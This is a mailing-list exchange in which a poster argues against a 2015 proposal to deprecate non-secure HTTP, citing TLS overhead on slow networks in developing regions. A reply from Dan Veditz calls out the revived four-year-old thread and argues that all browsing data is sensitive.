On Monday, April 13, 2015 at 10:57:58 AM UTC-4, Richard Barnes wrote: > There's pretty broad agreement that HTTPS is the way forward for the web. > [...] > In order to encourage web developers to move from HTTP to HTTPS, I would > like to propose establishing a deprecation plan for HTTP without security. > [...] For devs who claim to be crusaders of standards, your standards last little more than one financial cycle until deprecated and two years until removed. TLS has observable overhead (more round trips) on all 2G-4G connections vs. equivalent cleartext HTTP 1.1. For privileged developers who carry venture-capital-funded client test devices and the most expensive dev machines that money can buy, funded by Wall Street money, it is easy to throw away all the users who live in developing nations on budget client hardware or the lowest tiers of 3G or 4G networks. Cleartext has a place, and until HTTP/2 or QUIC can get round trips and packet sizes down to old cleartext levels on high-packet-loss, 2G, satellite, or the worst monopoly "State Post and Telegraph" 3G mobile networks, HTTPS should only be used for sensitive data or stateful queries.
You're replying to a 4-year-old thread. Don't do that: you're jumping over 4 years of other conversations, and tacked onto the end of an old thread, whatever arguments you're making will go unseen by a lot of people, depending on how their mail readers work. Your argument about HTTPS overhead on poor networks makes some sense, but that tiny amount of data is completely swamped by the average size of a single image these days, let alone an entire page. > HTTPS should only be used for sensitive data or stateful queries. What we've learned from "surveillance capitalism" over the past several years is that it is _all_ sensitive data. -Dan Veditz